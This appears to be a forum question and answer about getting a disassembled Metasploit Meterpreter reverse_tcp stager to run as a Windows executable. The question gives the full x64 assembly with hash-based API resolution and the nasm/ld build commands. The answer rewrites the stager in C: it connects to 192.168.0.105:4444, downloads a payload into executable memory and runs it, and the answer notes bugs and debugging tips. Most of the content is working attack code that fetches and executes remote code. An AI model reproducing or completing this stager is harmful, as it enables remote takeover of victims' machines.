mov r8d,[rax+0x24]
add r8,rdx
mov cx,[r8+rcx*2]
mov r8d,[rax+0x1c]
add r8,rdx
mov eax,[r8+rcx*4]
add rax,rdx
pop r8
pop r8
pop rsi
pop rcx
pop rdx
pop r8
pop r9
pop r10
sub rsp,byte +0x20
push r10
jmp rax
second_jmp:
pop rax
first_jmp:
pop r9
pop rdx
mov rdx,[rdx]
jmp dword fifth_jmp ;0x21
first_call:
pop rbp
mov r14,0x32335f327377
push r14
mov r14,rsp
sub rsp,0x1a0
mov r13,rsp
mov r12,0x6900a8c05c110002
push r12
mov r12,rsp
mov rcx,r14
mov r10d,0x726774c
call rbp
mov rdx,r13
push dword 0x101
pop rcx
mov r10d,0x6b8029
call rbp
push byte +0x5
pop r14
ninth_jmp:
push rax
push rax
xor r9,r9
xor r8,r8
inc rax
mov rdx,rax
inc rax
mov rcx,rax
mov r10d,0xe0df0fea
call rbp
mov rdi,rax
sixth_jmp:
push byte +0x10
pop r8
mov rdx,r12
mov rcx,rdi
mov r10d,0x6174a599
call rbp
test eax,eax
jz 0x15e
dec r14
jnz sixth_jmp ;0x13e
call second_call ;dword 0x1f1
sub rsp,byte +0x10
mov rdx,rsp
xor r9,r9
push byte +0x4
pop r8
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jng seventh_jmp ;0x1d1
add rsp,byte +0x20
pop rsi
mov esi,esi
push byte +0x40
pop r9
push dword 0x1000
pop r8
mov rdx,rsi
xor rcx,rcx
mov r10d,0xe553a458
call rbp
mov rbx,rax
mov r15,rax
tenth_jmp:
xor r9,r9
mov r8,rsi
mov rdx,rbx
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jnl eighth_jmp ;0x1e3
pop rax
push r15
pop rcx
push dword 0x4000
pop r8
push byte +0x0
pop rdx
mov r10d,0x300f2f0b
call rbp
seventh_jmp:
push rdi
pop rcx
mov r10d,0x614d6e75
call rbp
dec r14
jmp ninth_jmp ;0x11f
eighth_jmp:
add rbx,rax
sub rsi,rax
test rsi,rsi
jnz tenth_jmp ;0x1a2
jmp r15
second_call:
pop rax
push byte +0x0
pop rcx
mov r10,0x56a2b5f0
call rbp
Before making any changes to the ndisasm output (apart from modifying the call and jmp destinations from relative addresses to labels, see code above), I compiled and linked the output using:
nasm -f win64 -o meterpreter_reverse_tcp.o meterpreter_reverse_tcp.asm
/opt/mingw/x86_64-w64-mingw32/bin/ld -o meterpreter_reverse_tcp.exe meterpreter_reverse_tcp.o
But when I ran the .exe on my windows 10 machine, I got the following error:
Meterpreter_reverse_tcp.exe has stopped working. A problem caused the program to stop working correctly. Windows will close the program and notify you if a solution is available.
The output of the command 'file meterpreter_reverse_tcp.exe' is:
meterpreter_reverse_tcp.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
What did I do wrong ?
your shell code if convert it to c/c++ is next:
LoadLibraryA("ws2_32");
WSADATA wd;
WSAStartup(MAKEWORD(1,1), &wd);
loop:
SOCKET s = WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
SOCKADDR_IN sa = { AF_INET, _byteswap_ushort(4444) };
sa.sin_addr.s_addr = IP(192, 168, 0, 105);
// try 5 times connect to 192.168.0.105
int n = 5;
do
{
if (connect(s, (sockaddr*)&sa, sizeof(SOCKADDR_IN)) == NOERROR)
{
// we connected
break;
}
} while (--n);
ExitProcess(0);// !! error in shellcode or special damaged ?
ULONG len;
// get the length of shellcode
if (0 < recv(s, (char*)&len, sizeof(len), 0))
{
// allocate buffer for shellcode
PVOID pv = VirtualAlloc(0, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* buf = (char*)pv;
// download shellcode in loop
do
{
if (0 > (n = recv(s, buf, len, 0)))
{
// download fail
// bug !!
// must be MEM_RELEASE for free memory, but used MEM_DECOMMIT in code.
VirtualFree(pv, 0, MEM_DECOMMIT);
closesocket(s);
goto loop;
}
} while (buf += n, len -= n);
// all shellcode downloaded
// call it
((FARPROC)pv)();
}
ExitProcess(0);
it i be say worked under debugger. if something not worked for you - debug it. especially put bp on jmp rax - the begin of shell code is function which search for exported api (by hash) and call it (jmp rax)

Resources